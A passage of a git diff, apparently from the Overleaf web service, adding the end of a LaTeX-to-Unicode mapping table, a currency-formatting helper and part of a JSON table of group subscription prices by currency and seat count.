[/\\ding\{198\}/g, '\u2786'], + [/\\ding\{199\}/g, '\u2787'], + [/\\ding\{200\}/g, '\u2788'], + [/\\ding\{201\}/g, '\u2789'], + [/\\ding\{202\}/g, '\u278A'], + [/\\ding\{203\}/g, '\u278B'], + [/\\ding\{204\}/g, '\u278C'], + [/\\ding\{205\}/g, '\u278D'], + [/\\ding\{206\}/g, '\u278E'], + [/\\ding\{207\}/g, '\u278F'], + [/\\ding\{208\}/g, '\u2790'], + [/\\ding\{209\}/g, '\u2791'], + [/\\ding\{210\}/g, '\u2792'], + [/\\ding\{211\}/g, '\u2793'], + [/\\ding\{212\}/g, '\u2794'], + [/\\ding\{216\}/g, '\u2798'], + [/\\ding\{217\}/g, '\u2799'], + [/\\ding\{218\}/g, '\u279A'], + [/\\ding\{219\}/g, '\u279B'], + [/\\ding\{220\}/g, '\u279C'], + [/\\ding\{221\}/g, '\u279D'], + [/\\ding\{222\}/g, '\u279E'], + [/\\ding\{223\}/g, '\u279F'], + [/\\ding\{224\}/g, '\u27A0'], + [/\\ding\{225\}/g, '\u27A1'], + [/\\ding\{226\}/g, '\u27A2'], + [/\\ding\{227\}/g, '\u27A3'], + [/\\ding\{228\}/g, '\u27A4'], + [/\\ding\{229\}/g, '\u27A5'], + [/\\ding\{230\}/g, '\u27A6'], + [/\\ding\{231\}/g, '\u27A7'], + [/\\ding\{232\}/g, '\u27A8'], + [/\\ding\{233\}/g, '\u27A9'], + [/\\ding\{234\}/g, '\u27AA'], + [/\\ding\{235\}/g, '\u27AB'], + [/\\ding\{236\}/g, '\u27AC'], + [/\\ding\{237\}/g, '\u27AD'], + [/\\ding\{238\}/g, '\u27AE'], + [/\\ding\{239\}/g, '\u27AF'], + [/\\ding\{241\}/g, '\u27B1'], + [/\\ding\{242\}/g, '\u27B2'], + [/\\ding\{243\}/g, '\u27B3'], + [/\\ding\{244\}/g, '\u27B4'], + [/\\ding\{245\}/g, '\u27B5'], + [/\\ding\{246\}/g, '\u27B6'], + [/\\ding\{247\}/g, '\u27B7'], + [/\\ding\{248\}/g, '\u27B8'], + [/\\ding\{249\}/g, '\u27B9'], + [/\\ding\{250\}/g, '\u27BA'], + [/\\ding\{251\}/g, '\u27BB'], + [/\\ding\{252\}/g, '\u27BC'], + [/\\ding\{253\}/g, '\u27BD'], + [/\\ding\{254\}/g, '\u27BE'], + [/\\longleftarrow /g, '\u27F5'], + [/\\longrightarrow /g, '\u27F6'], + [/\\longleftrightarrow /g, '\u27F7'], + [/\\Longleftarrow /g, '\u27F8'], + [/\\Longrightarrow /g, '\u27F9'], + [/\\Longleftrightarrow /g, '\u27FA'], + [/\\longmapsto /g, '\u27FC'], + [/\\sim\\joinrel\\leadsto/g, '\u27FF'], + [/\\ElsevierGlyph\{E212\}/g, '\u2905'], + [/\\UpArrowBar /g, '\u2912'], + [/\\DownArrowBar /g, '\u2913'], + [/\\ElsevierGlyph\{E20C\}/g, '\u2923'], + [/\\ElsevierGlyph\{E20D\}/g, '\u2924'], + [/\\ElsevierGlyph\{E20B\}/g, '\u2925'], + [/\\ElsevierGlyph\{E20A\}/g, '\u2926'], + [/\\ElsevierGlyph\{E211\}/g, '\u2927'], + [/\\ElsevierGlyph\{E20E\}/g, '\u2928'], + [/\\ElsevierGlyph\{E20F\}/g, '\u2929'], + [/\\ElsevierGlyph\{E210\}/g, '\u292A'], + [/\\ElsevierGlyph\{E21C\}/g, '\u2933'], + [/\\ElsevierGlyph\{E21D\}/g, '\u2933-00338'], + [/\\ElsevierGlyph\{E21A\}/g, '\u2936'], + [/\\ElsevierGlyph\{E219\}/g, '\u2937'], + [/\\Elolarr /g, '\u2940'], + [/\\Elorarr /g, '\u2941'], + [/\\ElzRlarr /g, '\u2942'], + [/\\ElzrLarr /g, '\u2944'], + [/\\Elzrarrx /g, '\u2947'], + [/\\LeftRightVector /g, '\u294E'], + [/\\RightUpDownVector /g, '\u294F'], + [/\\DownLeftRightVector /g, '\u2950'], + [/\\LeftUpDownVector /g, '\u2951'], + [/\\LeftVectorBar /g, '\u2952'], + [/\\RightVectorBar /g, '\u2953'], + [/\\RightUpVectorBar /g, '\u2954'], + [/\\RightDownVectorBar /g, '\u2955'], + [/\\DownLeftVectorBar /g, '\u2956'], + [/\\DownRightVectorBar /g, '\u2957'], + [/\\LeftUpVectorBar /g, '\u2958'], + [/\\LeftDownVectorBar /g, '\u2959'], + [/\\LeftTeeVector /g, '\u295A'], + [/\\RightTeeVector /g, '\u295B'], + [/\\RightUpTeeVector /g, '\u295C'], + [/\\RightDownTeeVector /g, '\u295D'], + [/\\DownLeftTeeVector /g, '\u295E'], + [/\\DownRightTeeVector /g, '\u295F'], + [/\\LeftUpTeeVector /g, '\u2960'], + [/\\LeftDownTeeVector /g, '\u2961'], + [/\\UpEquilibrium /g, '\u296E'], + [/\\ReverseUpEquilibrium /g, '\u296F'], + [/\\RoundImplies /g, '\u2970'], + [/\\ElsevierGlyph\{E214\}/g, '\u297C'], + [/\\ElsevierGlyph\{E215\}/g, '\u297D'], + [/\\Elztfnc /g, '\u2980'], + [/\\ElsevierGlyph\{3018\}/g, '\u2985'], + [/\\Elroang /g, '\u2986'], + [/\\ElsevierGlyph\{E291\}/g, '\u2994'], + [/\\Elzddfnc /g, '\u2999'], + [/\\Angle /g, '\u299C'], + [/\\Elzlpargt /g, '\u29A0'], + [/\\ElsevierGlyph\{E260\}/g, '\u29B5'], + [/\\ElsevierGlyph\{E61B\}/g, '\u29B6'], + [/\\ElzLap /g, '\u29CA'], + [/\\Elzdefas /g, '\u29CB'], + [/\\LeftTriangleBar /g, '\u29CF'], + [/\\NotLeftTriangleBar /g, '\u29CF-00338'], + [/\\RightTriangleBar /g, '\u29D0'], + [/\\NotRightTriangleBar /g, '\u29D0-00338'], + [/\\ElsevierGlyph\{E372\}/g, '\u29DC'], + [/\\blacklozenge /g, '\u29EB'], + [/\\RuleDelayed /g, '\u29F4'], + [/\\Elxuplus /g, '\u2A04'], + [/\\ElzThr /g, '\u2A05'], + [/\\Elxsqcup /g, '\u2A06'], + [/\\ElzInf /g, '\u2A07'], + [/\\ElzSup /g, '\u2A08'], + [/\\ElzCint /g, '\u2A0D'], + [/\\clockoint /g, '\u2A0F'], + [/\\ElsevierGlyph\{E395\}/g, '\u2A10'], + [/\\sqrint /g, '\u2A16'], + [/\\ElsevierGlyph\{E25A\}/g, '\u2A25'], + [/\\ElsevierGlyph\{E25B\}/g, '\u2A2A'], + [/\\ElsevierGlyph\{E25C\}/g, '\u2A2D'], + [/\\ElsevierGlyph\{E25D\}/g, '\u2A2E'], + [/\\ElzTimes /g, '\u2A2F'], + [/\\ElsevierGlyph\{E25E\}/g, '\u2A34'], + [/\\ElsevierGlyph\{E25E\}/g, '\u2A35'], + [/\\ElsevierGlyph\{E259\}/g, '\u2A3C'], + [/\\amalg /g, '\u2A3F'], + [/\\ElzAnd /g, '\u2A53'], + [/\\ElzOr /g, '\u2A54'], + [/\\ElsevierGlyph\{E36E\}/g, '\u2A55'], + [/\\ElOr /g, '\u2A56'], + [/\\perspcorrespond /g, '\u2A5E'], + [/\\Elzminhat /g, '\u2A5F'], + [/\\ElsevierGlyph\{225A\}/g, '\u2A63'], + [/\\stackrel\{*\}\{=\}/g, '\u2A6E'], + [/\\Equal /g, '\u2A75'], + [/\\leqslant /g, '\u2A7D'], + [/\\nleqslant /g, '\u2A7D-00338'], + [/\\geqslant /g, '\u2A7E'], + [/\\ngeqslant /g, '\u2A7E-00338'], + [/\\lessapprox /g, '\u2A85'], + [/\\gtrapprox /g, '\u2A86'], + [/\\lneq /g, '\u2A87'], + [/\\gneq /g, '\u2A88'], + [/\\lnapprox /g, '\u2A89'], + [/\\gnapprox /g, '\u2A8A'], + [/\\lesseqqgtr /g, '\u2A8B'], + [/\\gtreqqless /g, '\u2A8C'], + [/\\eqslantless /g, '\u2A95'], + [/\\eqslantgtr /g, '\u2A96'], + [/\\Pisymbol\{ppi020\}\{117\}/g, '\u2A9D'], + [/\\Pisymbol\{ppi020\}\{105\}/g, '\u2A9E'], + [/\\NestedLessLess /g, '\u2AA1'], + [/\\NotNestedLessLess /g, '\u2AA1-00338'], + [/\\NestedGreaterGreater /g, '\u2AA2'], + [/\\NotNestedGreaterGreater /g, '\u2AA2-00338'], + [/\\preceq /g, '\u2AAF'], + [/\\not\\preceq /g, '\u2AAF-00338'], + [/\\succeq /g, '\u2AB0'], + [/\\not\\succeq /g, '\u2AB0-00338'], + [/\\precneqq /g, '\u2AB5'], + [/\\succneqq /g, '\u2AB6'], + [/\\precapprox /g, '\u2AB7'], + [/\\succapprox /g, '\u2AB8'], + [/\\precnapprox /g, '\u2AB9'], + [/\\succnapprox /g, '\u2ABA'], + [/\\subseteqq /g, '\u2AC5'], + [/\\nsubseteqq /g, '\u2AC5-00338'], + [/\\supseteqq /g, '\u2AC6'], + [/\\nsupseteqq/g, '\u2AC6-00338'], + [/\\subsetneqq /g, '\u2ACB'], + [/\\supsetneqq /g, '\u2ACC'], + [/\\ElsevierGlyph\{E30D\}/g, '\u2AEB'], + [/\\Elztdcol /g, '\u2AF6'], + [/\\ElsevierGlyph\{300A\}/g, '\u300A'], + [/\\ElsevierGlyph\{300B\}/g, '\u300B'], + [/\\ElsevierGlyph\{3018\}/g, '\u3018'], + [/\\ElsevierGlyph\{3019\}/g, '\u3019'], + [/\\openbracketleft /g, '\u301A'], + [/\\openbracketright /g, '\u301B'], +] + +if (typeof module !== 'undefined' && module.exports) { + module.exports = BibtexParser +} diff --git a/services/web/app/src/util/currency.js b/services/web/app/src/util/currency.js new file mode 100644 index 0000000..ac66679 --- /dev/null +++ b/services/web/app/src/util/currency.js @@ -0,0 +1,38 @@ +/** + * This file is duplicated from services/web/frontend/js/shared/utils/currency.ts + */ + +/** + * @import { CurrencyCode } from '../../../types/subscription/currency' + */ + +/** + * @param {number} amount + * @param {CurrencyCode} currency + * @param {string} locale + * @param {boolean} stripIfInteger + * @returns {string} + */ +function formatCurrency(amount, currency, locale, stripIfInteger) { + const options = { style: 'currency', currency } + if (stripIfInteger && Number.isInteger(amount)) { + options.minimumFractionDigits = 0 + } + + try { + return amount.toLocaleString(locale, { + ...options, + currencyDisplay: 'narrowSymbol', + }) + } catch {} + + try { + return amount.toLocaleString(locale, options) + } catch {} + + return `${currency} ${amount}` +} + +module.exports = { + formatCurrency, +} diff --git a/services/web/app/templates/plans/groups.json b/services/web/app/templates/plans/groups.json new file mode 100644 index 0000000..1a4994c --- /dev/null +++ b/services/web/app/templates/plans/groups.json @@ -0,0 +1,2054 @@ +{ + "educational": { + "professional": { + "AUD": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + "price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "BRL": { + "2": { + "price_in_cents": 119800, + "additional_license_legacy_price_in_cents": 69900 + }, + "3": { + "price_in_cents": 179700, + "additional_license_legacy_price_in_cents": 69900 + }, + "4": { + "price_in_cents": 239600, + "additional_license_legacy_price_in_cents": 69900 + }, + "5": { + "price_in_cents": 299500, + "additional_license_legacy_price_in_cents": 69900 + }, + "10": { + "price_in_cents": 599000, + "additional_license_legacy_price_in_cents": 38900 + }, + "20": { + "price_in_cents": 1198000, + "additional_license_legacy_price_in_cents": 35900 + }, + "50": { + "price_in_cents": 2995000, + "additional_license_legacy_price_in_cents": 32900 + } + }, + "CAD": { + "2": { + "price_in_cents": 53800, + "additional_license_legacy_price_in_cents": 31400 + }, + "3": { + "price_in_cents": 80700, + "additional_license_legacy_price_in_cents": 31400 + }, + "4": { + "price_in_cents": 107600, + "additional_license_legacy_price_in_cents": 31400 + }, + "5": { + "price_in_cents": 134500, + "additional_license_legacy_price_in_cents": 31400 + }, + "10": { + "price_in_cents": 269000, + "additional_license_legacy_price_in_cents": 17500 + }, + "20": { + "price_in_cents": 538000, + "additional_license_legacy_price_in_cents": 16100 + }, + "50": { + "price_in_cents": 1345000, + "additional_license_legacy_price_in_cents": 14800 + } + }, + "CHF": { + "2": { + "price_in_cents": 47800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 71700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 95600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 119500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 239000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 478000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1195000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "CLP": { + "2": { + "price_in_cents": 28918800, + "additional_license_legacy_price_in_cents": 16869300 + }, + "3": { + "price_in_cents": 43378200, + "additional_license_legacy_price_in_cents": 16869300 + }, + "4": { + "price_in_cents": 57837600, + "additional_license_legacy_price_in_cents": 16869300 + }, + "5": { + "price_in_cents": 72297000, + "additional_license_legacy_price_in_cents": 16869300 + }, + "10": { + "price_in_cents": 144594000, + "additional_license_legacy_price_in_cents": 9398600 + }, + "20": { + "price_in_cents": 289188000, + "additional_license_legacy_price_in_cents": 8675600 + }, + "50": { + "price_in_cents": 722970000, + "additional_license_legacy_price_in_cents": 7952600 + } + }, + "COP": { + "2": { + "price_in_cents": 94788000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "3": { + "price_in_cents": 142182000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "4": { + "price_in_cents": 189576000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "5": { + "price_in_cents": 236970000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "10": { + "price_in_cents": 473940000, + "additional_license_legacy_price_in_cents": 30806100 + }, + "20": { + "price_in_cents": 947880000, + "additional_license_legacy_price_in_cents": 28436400 + }, + "50": { + "price_in_cents": 2000000000, + "additional_license_legacy_price_in_cents": 26066700 + } + }, + "DKK": { + "2": { + "price_in_cents": 285400, + "additional_license_legacy_price_in_cents": 166500 + }, + "3": { + "price_in_cents": 428100, + "additional_license_legacy_price_in_cents": 166500 + }, + "4": { + "price_in_cents": 570800, + "additional_license_legacy_price_in_cents": 166500 + }, + "5": { + "price_in_cents": 713500, + "additional_license_legacy_price_in_cents": 166500 + }, + "10": { + "price_in_cents": 1427000, + "additional_license_legacy_price_in_cents": 92700 + }, + "20": { + "price_in_cents": 2854000, + "additional_license_legacy_price_in_cents": 85600 + }, + "50": { + "price_in_cents": 7135000, + "additional_license_legacy_price_in_cents": 78500 + } + }, + "EUR": { + "2": { + "price_in_cents": 44200, + "additional_license_legacy_price_in_cents": 25800 + }, + "3": { + "price_in_cents": 66300, + "additional_license_legacy_price_in_cents": 25800 + }, + "4": { + "price_in_cents": 88400, + "additional_license_legacy_price_in_cents": 25800 + }, + "5": { + "price_in_cents": 110500, + "additional_license_legacy_price_in_cents": 25800 + }, + "10": { + "price_in_cents": 221000, + "additional_license_legacy_price_in_cents": 14300 + }, + "20": { + "price_in_cents": 442000, + "additional_license_legacy_price_in_cents": 13200 + }, + "50": { + "price_in_cents": 1105000, + "additional_license_legacy_price_in_cents": 12100 + } + }, + "GBP": { + "2": { + "price_in_cents": 38200, + "additional_license_legacy_price_in_cents": 22300 + }, + "3": { + "price_in_cents": 57300, + "additional_license_legacy_price_in_cents": 22300 + }, + "4": { + "price_in_cents": 76400, + "additional_license_legacy_price_in_cents": 22300 + }, + "5": { + "price_in_cents": 95500, + "additional_license_legacy_price_in_cents": 22300 + }, + "10": { + "price_in_cents": 191000, + "additional_license_legacy_price_in_cents": 12400 + }, + "20": { + "price_in_cents": 382000, + "additional_license_legacy_price_in_cents": 11400 + }, + "50": { + "price_in_cents": 955000, + "additional_license_legacy_price_in_cents": 10500 + } + }, + "INR": { + "2": { + "price_in_cents": 1151800, + "additional_license_legacy_price_in_cents": 671900 + }, + "3": { + "price_in_cents": 1727700, + "additional_license_legacy_price_in_cents": 671900 + }, + "4": { + "price_in_cents": 2303600, + "additional_license_legacy_price_in_cents": 671900 + }, + "5": { + "price_in_cents": 2879500, + "additional_license_legacy_price_in_cents": 671900 + }, + "10": { + "price_in_cents": 5759000, + "additional_license_legacy_price_in_cents": 374300 + }, + "20": { + "price_in_cents": 11518000, + "additional_license_legacy_price_in_cents": 345500 + }, + "50": { + "price_in_cents": 28795000, + "additional_license_legacy_price_in_cents": 316700 + } + }, + "MXN": { + "2": { + "price_in_cents": 707800, + "additional_license_legacy_price_in_cents": 412900 + }, + "3": { + "price_in_cents": 1061700, + "additional_license_legacy_price_in_cents": 412900 + }, + "4": { + "price_in_cents": 1415600, + "additional_license_legacy_price_in_cents": 412900 + }, + "5": { + "price_in_cents": 1769500, + "additional_license_legacy_price_in_cents": 412900 + }, + "10": { + "price_in_cents": 3539000, + "additional_license_legacy_price_in_cents": 230000 + }, + "20": { + "price_in_cents": 7078000, + "additional_license_legacy_price_in_cents": 212300 + }, + "50": { + "price_in_cents": 17695000, + "additional_license_legacy_price_in_cents": 194600 + } + }, + "NOK": { + "2": { + "price_in_cents": 344200, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 516300, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 688400, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 860500, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 1721000, + "additional_license_legacy_price_in_cents": 111800 + }, + "20": { + "price_in_cents": 3442000, + "additional_license_legacy_price_in_cents": 103200 + }, + "50": { + "price_in_cents": 8605000, + "additional_license_legacy_price_in_cents": 94600 + } + }, + "NZD": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + "price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "PEN": { + "2": { + "price_in_cents": 115000, + "additional_license_legacy_price_in_cents": 67100 + }, + "3": { + "price_in_cents": 172500, + "additional_license_legacy_price_in_cents": 67100 + }, + "4": { + "price_in_cents": 230000, + "additional_license_legacy_price_in_cents": 67100 + }, + "5": { + "price_in_cents": 287500, + "additional_license_legacy_price_in_cents": 67100 + }, + "10": { + "price_in_cents": 575000, + "additional_license_legacy_price_in_cents": 37400 + }, + "20": { + "price_in_cents": 1150000, + "additional_license_legacy_price_in_cents": 34500 + }, + "50": { + "price_in_cents": 2875000, + "additional_license_legacy_price_in_cents": 31600 + } + }, + "SEK": { + "2": { + "price_in_cents": 344200, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 516300, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 688400, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 860500, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 1721000, + "additional_license_legacy_price_in_cents": 111800 + }, + "20": { + "price_in_cents": 3442000, + "additional_license_legacy_price_in_cents": 103200 + }, + "50": { + "price_in_cents": 8605000, + "additional_license_legacy_price_in_cents": 94600 + } + }, + "SGD": { + "2": { + "price_in_cents": 62200, + "additional_license_legacy_price_in_cents": 36300 + }, + "3": { + "price_in_cents": 93300, + "additional_license_legacy_price_in_cents": 36300 + }, + "4": { + "price_in_cents": 124400, + "additional_license_legacy_price_in_cents": 36300 + }, + "5": { + "price_in_cents": 155500, + "additional_license_legacy_price_in_cents": 36300 + }, + "10": { + "price_in_cents": 311000, + "additional_license_legacy_price_in_cents": 20200 + }, + "20": { + "price_in_cents": 622000, + "additional_license_legacy_price_in_cents": 18600 + }, + "50": { + "price_in_cents": 1555000, + "additional_license_legacy_price_in_cents": 17100 + } + }, + "USD": { + "2": { + "price_in_cents": 47800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 71700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 95600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 119500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 239000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 478000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1195000, + "additional_license_legacy_price_in_cents": 13100 + } + } + }, + "collaborator": { + "AUD": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 9300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 8600 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 7800 + } + }, + "BRL": { + "2": { + "price_in_cents": 59800, + "additional_license_legacy_price_in_cents": 34900 + }, + "3": { + "price_in_cents": 89700, + "additional_license_legacy_price_in_cents": 34900 + }, + "4": { + "price_in_cents": 119600, + "additional_license_legacy_price_in_cents": 34900 + }, + "5": { + "price_in_cents": 149500, + "additional_license_legacy_price_in_cents": 34900 + }, + "10": { + "price_in_cents": 299000, + "additional_license_legacy_price_in_cents": 19400 + }, + "20": { + "price_in_cents": 598000, + "additional_license_legacy_price_in_cents": 17900 + }, + "50": { + "price_in_cents": 1495000, + "additional_license_legacy_price_in_cents": 16400 + } + }, + "CAD": { + "2": { + "price_in_cents": 27400, + "additional_license_legacy_price_in_cents": 16000 + }, + "3": { + "price_in_cents": 41100, + "additional_license_legacy_price_in_cents": 16000 + }, + "4": { + "price_in_cents": 54800, + "additional_license_legacy_price_in_cents": 16000 + }, + "5": { + "price_in_cents": 68500, + "additional_license_legacy_price_in_cents": 16000 + }, + "10": { + "price_in_cents": 137000, + "additional_license_legacy_price_in_cents": 8900 + }, + "20": { + "price_in_cents": 274000, + "additional_license_legacy_price_in_cents": 8200 + }, + "50": { + "price_in_cents": 685000, + "additional_license_legacy_price_in_cents": 7500 + } + }, + "CHF": { + "2": { + "price_in_cents": 23800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 35700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 47600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 59500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 119000, + "additional_license_legacy_price_in_cents": 7700 + }, + "20": { + "price_in_cents": 238000, + "additional_license_legacy_price_in_cents": 7100 + }, + "50": { + "price_in_cents": 595000, + "additional_license_legacy_price_in_cents": 6500 + } + }, + "CLP": { + "2": { + "price_in_cents": 13318800, + "additional_license_legacy_price_in_cents": 7769300 + }, + "3": { + "price_in_cents": 19978200, + "additional_license_legacy_price_in_cents": 7769300 + }, + "4": { + "price_in_cents": 26637600, + "additional_license_legacy_price_in_cents": 7769300 + }, + "5": { + "price_in_cents": 33297000, + "additional_license_legacy_price_in_cents": 7769300 + }, + "10": { + "price_in_cents": 66594000, + "additional_license_legacy_price_in_cents": 4328600 + }, + "20": { + "price_in_cents": 133188000, + "additional_license_legacy_price_in_cents": 3995600 + }, + "50": { + "price_in_cents": 332970000, + "additional_license_legacy_price_in_cents": 3662600 + } + }, + "COP": { + "2": { + "price_in_cents": 46788000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "3": { + "price_in_cents": 70182000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "4": { + "price_in_cents": 93576000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "5": { + "price_in_cents": 116970000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "10": { + "price_in_cents": 233940000, + "additional_license_legacy_price_in_cents": 15206100 + }, + "20": { + "price_in_cents": 467880000, + "additional_license_legacy_price_in_cents": 14036400 + }, + "50": { + "price_in_cents": 1169700000, + "additional_license_legacy_price_in_cents": 12866700 + } + }, + "DKK": { + "2": { + "price_in_cents": 143800, + "additional_license_legacy_price_in_cents": 83900 + }, + "3": { + "price_in_cents": 215700, + "additional_license_legacy_price_in_cents": 83900 + }, + "4": { + "price_in_cents": 287600, + "additional_license_legacy_price_in_cents": 83900 + }, + "5": { + "price_in_cents": 359500, + "additional_license_legacy_price_in_cents": 83900 + }, + "10": { + "price_in_cents": 719000, + "additional_license_legacy_price_in_cents": 46700 + }, + "20": { + "price_in_cents": 1438000, + "additional_license_legacy_price_in_cents": 43100 + }, + "50": { + "price_in_cents": 3595000, + "additional_license_legacy_price_in_cents": 39500 + } + }, + "EUR": { + "2": { + "price_in_cents": 21400, + "additional_license_legacy_price_in_cents": 12500 + }, + "3": { + "price_in_cents": 32100, + "additional_license_legacy_price_in_cents": 12500 + }, + "4": { + "price_in_cents": 42800, + "additional_license_legacy_price_in_cents": 12500 + }, + "5": { + "price_in_cents": 53500, + "additional_license_legacy_price_in_cents": 12500 + }, + "10": { + "price_in_cents": 107000, + "additional_license_legacy_price_in_cents": 6900 + }, + "20": { + "price_in_cents": 214000, + "additional_license_legacy_price_in_cents": 6400 + }, + "50": { + "price_in_cents": 535000, + "additional_license_legacy_price_in_cents": 5900 + } + }, + "GBP": { + "2": { + "price_in_cents": 19000, + "additional_license_legacy_price_in_cents": 11100 + }, + "3": { + "price_in_cents": 28500, + "additional_license_legacy_price_in_cents": 11100 + }, + "4": { + "price_in_cents": 38000, + "additional_license_legacy_price_in_cents": 11100 + }, + "5": { + "price_in_cents": 47500, + "additional_license_legacy_price_in_cents": 11100 + }, + "10": { + "price_in_cents": 95000, + "additional_license_legacy_price_in_cents": 6200 + }, + "20": { + "price_in_cents": 190000, + "additional_license_legacy_price_in_cents": 5700 + }, + "50": { + "price_in_cents": 475000, + "additional_license_legacy_price_in_cents": 5200 + } + }, + "INR": { + "2": { + "price_in_cents": 551800, + "additional_license_legacy_price_in_cents": 321900 + }, + "3": { + "price_in_cents": 827700, + "additional_license_legacy_price_in_cents": 321900 + }, + "4": { + "price_in_cents": 1103600, + "additional_license_legacy_price_in_cents": 321900 + }, + "5": { + "price_in_cents": 1379500, + "additional_license_legacy_price_in_cents": 321900 + }, + "10": { + "price_in_cents": 2759000, + "additional_license_legacy_price_in_cents": 179300 + }, + "20": { + "price_in_cents": 5518000, + "additional_license_legacy_price_in_cents": 165500 + }, + "50": { + "price_in_cents": 13795000, + "additional_license_legacy_price_in_cents": 151700 + } + }, + "MXN": { + "2": { + "price_in_cents": 347800, + "additional_license_legacy_price_in_cents": 202900 + }, + "3": { + "price_in_cents": 521700, + "additional_license_legacy_price_in_cents": 202900 + }, + "4": { + "price_in_cents": 695600, + "additional_license_legacy_price_in_cents": 202900 + }, + "5": { + "price_in_cents": 869500, + "additional_license_legacy_price_in_cents": 202900 + }, + "10": { + "price_in_cents": 1739000, + "additional_license_legacy_price_in_cents": 113000 + }, + "20": { + "price_in_cents": 3478000, + "additional_license_legacy_price_in_cents": 104300 + }, + "50": { + "price_in_cents": 8695000, + "additional_license_legacy_price_in_cents": 95600 + } + }, + "NOK": { + "2": { + "price_in_cents": 173800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 260700, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 347600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 434500, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 869000, + "additional_license_legacy_price_in_cents": 56500 + }, + "20": { + "price_in_cents": 1738000, + "additional_license_legacy_price_in_cents": 52100 + }, + "50": { + "price_in_cents": 4345000, + "additional_license_legacy_price_in_cents": 47800 + } + }, + "NZD": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 9300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 8600 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 7800 + } + }, + "PEN": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + 